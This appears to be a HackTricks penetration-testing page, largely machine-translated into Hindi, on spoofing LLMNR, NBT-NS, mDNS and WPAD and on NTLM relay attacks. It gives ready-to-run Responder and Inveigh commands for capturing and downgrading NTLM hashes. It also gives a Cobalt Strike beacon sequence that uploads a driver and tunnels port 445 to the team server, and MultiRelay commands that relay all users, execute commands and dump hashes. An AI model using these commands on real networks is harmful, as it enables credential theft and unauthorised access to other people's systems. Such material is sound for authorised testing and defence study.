Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Network Protocols

Local Host Resolution Protocols

LLMNR, NBT-NS, and mDNS:
Microsoft और अन्य ऑपरेटिंग सिस्टम DNS विफल होने पर स्थानीय नाम समाधान के लिए LLMNR और NBT-NS का उपयोग करते हैं। इसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
ये प्रोटोकॉल UDP पर उनकी बिना प्रमाणीकरण, प्रसारण प्रकृति के कारण इंटरसेप्शन और स्पूफिंग के प्रति संवेदनशील हैं।
Responder का उपयोग इन प्रोटोकॉल को क्वेरी करने वाले होस्ट को जाली प्रतिक्रियाएँ भेजकर सेवाओं का अनुकरण करने के लिए किया जा सकता है।
Responder का उपयोग करके सेवा अनुकरण पर अधिक जानकारी यहाँ मिल सकती है।

Web Proxy Auto-Discovery Protocol (WPAD)

WPAD ब्राउज़रों को स्वचालित रूप से प्रॉक्सी सेटिंग्स खोजने की अनुमति देता है।
खोज DHCP, DNS के माध्यम से की जाती है, या यदि DNS विफल हो जाता है तो LLMNR और NBT-NS पर वापस जाती है।
Responder WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुर्भावनापूर्ण WPAD सर्वरों की ओर निर्देशित कर सकता है।

Responder for Protocol Poisoning

Responder एक उपकरण है जिसका उपयोग LLMNR, NBT-NS, और mDNS क्वेरीज़ को ज़हर देने के लिए किया जाता है, जो क्वेरी प्रकारों के आधार पर चयनात्मक रूप से प्रतिक्रिया करता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।
यह Kali Linux में पूर्व-स्थापित आता है, जिसे /etc/responder/Responder.conf पर कॉन्फ़िगर किया जा सकता है।
Responder स्क्रीन पर कैप्चर किए गए हैश प्रदर्शित करता है और उन्हें /usr/share/responder/logs निर्देशिका में सहेजता है।
यह IPv4 और IPv6 दोनों का समर्थन करता है।
Responder का Windows संस्करण यहाँ उपलब्ध है।

Running Responder

डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: responder -I <Interface>
अधिक आक्रामक प्रोबिंग के लिए (संभावित दुष्प्रभावों के साथ): responder -I <Interface> -P -r -v
आसान क्रैकिंग के लिए NTLMv1 चुनौतियों/प्रतिक्रियाओं को कैप्चर करने की तकनीकें: responder -I <Interface> --lm --disable-ess
WPAD अनुकरण को सक्रिय किया जा सकता है: responder -I <Interface> --wpad
NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और एक प्रमाणीकरण प्रॉक्सी स्थापित की जा सकती है: responder.py -I <interface> -Pv

DHCP Poisoning with Responder

DHCP प्रतिक्रियाओं को स्पूफ करना एक पीड़ित की रूटिंग जानकारी को स्थायी रूप से ज़हर दे सकता है, ARP ज़हर देने के लिए एक अधिक छिपा हुआ विकल्प प्रदान करता है।
यह लक्षित नेटवर्क की कॉन्फ़िगरेशन के बारे में सटीक ज्ञान की आवश्यकता होती है।
हमले को चलाना: ./Responder.py -I eth0 -Pdv
यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क में व्यवधान से बचने के लिए सावधानीपूर्वक हैंडलिंग की आवश्यकता होती है।

Capturing Credentials with Responder

Responder उपरोक्त प्रोटोकॉल का उपयोग करके सेवाओं का अनुकरण करेगा, जब एक उपयोगकर्ता स्पूफ की गई सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है, तो क्रेडेंशियल्स (आमतौर पर NTLMv2 चुनौती/प्रतिक्रिया) कैप्चर करता है।
NetNTLMv1 में डाउनग्रेड करने या आसान क्रेडेंशियल क्रैकिंग के लिए ESS को निष्क्रिय करने का प्रयास किया जा सकता है।

यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाए, उचित प्राधिकरण सुनिश्चित करते हुए और व्यवधान या अनधिकृत पहुंच से बचते हुए।

Inveigh

Inveigh एक उपकरण है जो पेनटेस्टर्स और रेड टीमर्स के लिए डिज़ाइन किया गया है, जो Windows सिस्टम के लिए है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, जिसमें Inveigh और InveighZero मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देश wiki में मिल सकते हैं।

Inveigh को PowerShell के माध्यम से संचालित किया जा सकता है:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

या C# बाइनरी के रूप में निष्पादित किया गया:

Inveigh.exe

NTLM Relay Attack

यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करके एक लक्षित मशीन तक पहुँचने के लिए किया जाता है, यदि सफल हो तो एक सिस्टम शेल प्रदान करता है। प्रमुख पूर्वापेक्षाएँ शामिल हैं:

प्रमाणीकरण करने वाले उपयोगकर्ता को रिले किए गए होस्ट पर स्थानीय व्यवस्थापक पहुँच होनी चाहिए।
SMB साइनिंग को अक्षम किया जाना चाहिए।

445 Port Forwarding and Tunneling

उन परिदृश्यों में जहाँ सीधे नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफ़िक को अग्रेषित और टनल करने की आवश्यकता होती है। PortBender जैसे उपकरण पोर्ट 445 ट्रैफ़िक को दूसरे पोर्ट पर पुनर्निर्देशित करने में मदद करते हैं, जो ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक पहुँच उपलब्ध होने पर आवश्यक है।

PortBender सेटअप और संचालन Cobalt Strike में:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

NTLM रिले हमले के लिए अन्य उपकरण

Metasploit: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।
smbrelayx: SMB सत्रों को रिले करने और कमांड निष्पादित करने या बैकडोर तैनात करने के लिए एक पायथन स्क्रिप्ट।
MultiRelay: Responder सूट से एक उपकरण जो विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने या हैश डंप करने के लिए है।

प्रत्येक उपकरण को आवश्यकतानुसार SOCKS प्रॉक्सी के माध्यम से संचालित करने के लिए कॉन्फ़िगर किया जा सकता है, जिससे अप्रत्यक्ष नेटवर्क पहुंच के साथ भी हमले सक्षम होते हैं।

MultiRelay संचालन

MultiRelay /usr/share/responder/tools निर्देशिका से निष्पादित किया जाता है, विशिष्ट IPs या उपयोगकर्ताओं को लक्षित करता है।

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

ये उपकरण और तकनीकें विभिन्न नेटवर्क वातावरण में NTLM Relay हमलों को करने के लिए एक व्यापक सेट बनाती हैं।

NTLM लॉगिन को मजबूर करना

Windows में आप कुछ विशेषाधिकार प्राप्त खातों को मनमाने मशीनों पर प्रमाणीकरण करने के लिए मजबूर कर सकते हैं। जानने के लिए निम्नलिखित पृष्ठ पढ़ें:

Force NTLM Privileged Authentication

संदर्भ

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousWebRTC DoS NextSpoofing SSDP and UPnP Devices with EvilSSDP

Last updated 3 days ago